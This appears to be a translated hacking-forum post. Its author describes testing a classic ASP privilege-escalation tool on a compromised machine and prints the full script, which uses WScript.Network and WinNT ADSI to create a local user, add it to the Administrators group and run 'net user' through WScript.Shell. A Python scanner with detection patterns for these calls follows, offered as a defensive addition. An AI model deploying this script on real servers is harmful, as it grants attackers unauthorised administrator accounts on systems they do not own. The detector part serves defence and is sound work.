In fact, Kevin and I tested it on my zombie last week, and the hippo epic. The result is that the Administrator group is successfully added under the user permission (although I can't believe my eyes).
I did not dare to publish the last time Kevin spoke... Now that he has published the post on his blog, it will be transferred (a little better than I did in the last test, and a form is added). Blessed are you.
The code is correct, but it rarely succeeds. It depends on luck... Well, next I want to integrate him into the ocean. Hey.
Program code:
<%@ CodePage=936 %>
<head>.Network object script Privilege Escalation Vulnerability exploitation tool</head>
<form action="useradd.asp" method="post">
User: <input name="username" type="text" value="kevin1986"><br>
Password: <input name="passwd" type="password"><br>
<input type="submit" value="">
</form>
<%
On Error Resume Next
' Only answer requests that come from the local machine
If Request.ServerVariables("remote_addr") <> "127.0.0.1" Then
    Response.Write "ip! S n0t right"
Else
    If Request("username") <> "" Then
        username = Request("username")
        passwd = Request("passwd")
        Response.Expires = 0
        Session.Timeout = 50
        Server.ScriptTimeout = 3000
        ' WScript.Network supplies the computer name for the WinNT ADSI path
        Set lp = Server.CreateObject("WScript.Network")
        oz = "WinNT://" & lp.ComputerName
        Set ob = GetObject(oz)
        Set oe = GetObject(oz & "/Administrators,group")
        ' Create the local account, then add it to the Administrators group
        Set od = ob.Create("user", username)
        od.SetPassword passwd
        od.SetInfo
        oe.Add oz & "/" & username
        If Err Then
            Response.Write "~~ Do not buy 6 + 1 today ...... Save 2 yuan to buy a bottle of cola ......"
        Else
            ' Check the result against the output of "net user <name>"
            If InStr(Server.CreateObject("WScript.Shell").Exec("cmd.exe /c net user " & username).StdOut.ReadAll, "Last login") > 0 Then
                Response.Write "although there is no error, it seems that it has not been established successfully. You must be very depressed"
            Else
                Response.Write "OMG! " & username & " is an account! This is an unknown vulnerability. 5,000,000 RMB is yours"
            End If
        End If
    Else
        Response.Write "Enter the user name"
    End If
End If
%>
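
A defender-side check for the pattern in the script above, as an added example that is not part of the original post: a static scan of classic ASP sources under a web root for the WinNT ADSI account-creation calls. The indicator set, the verdict levels and the function names are assumptions chosen for illustration.

```python
import os
import re
# Indicators are the calls used by the script above. VBScript ignores case and
# whitespace around "." and "(", so sources are normalised before matching.
INDICATORS = {
    "adsi_winnt": 'winnt://',
    "create_user": '.create("user"',
    "admin_group": 'administrators,group',
    "set_password": '.setpassword',
    "wscript_network": 'wscript.network',
    "wscript_shell": 'wscript.shell',
}

def normalise(src):
    """Lower-case, drop whitespace, and fold "a" & "b" literal concatenation."""
    text = re.sub(r"\s+", "", src.lower())
    return text.replace('"&"', "")

def scan_source(src):
    """Return (verdict, sorted indicator names) for one ASP source string."""
    text = normalise(src)
    hits = {name for name, needle in INDICATORS.items() if needle in text}
    verdict = "none"
    if {"adsi_winnt", "create_user", "admin_group"} <= hits:
        verdict = "high"    # creates an account and references Administrators
    elif "adsi_winnt" in hits and hits & {"create_user", "admin_group", "set_password"}:
        verdict = "medium"  # ADSI write or group access without the full pattern
    elif hits:
        verdict = "low"     # COM objects worth a manual look
    return verdict, sorted(hits)

def scan_tree(root, exts=(".asp", ".asa")):
    """Walk a web root (path chosen by the caller) and yield flagged files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                # latin-1 never fails to decode; the indicators are plain ASCII
                with open(path, encoding="latin-1") as fh:
                    verdict, hits = scan_source(fh.read())
                if verdict != "none":
                    yield path, verdict, hits

# Constructed samples: the first mirrors the page's script, the second splits a literal.
SAMPLE_PAGE = '''Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set od = GetObject(oz).Create("user", username)
GetObject(oz & "/Administrators,group").Add oz & "/" & username'''
SAMPLE_SPLIT = 'Set g = GetObject("Win" & "NT://" & host & "/Administrators,group")'
```

A "low" verdict only means the file instantiates one of the COM objects; legitimate administrative pages can do that, so those hits need manual review rather than automatic quarantine.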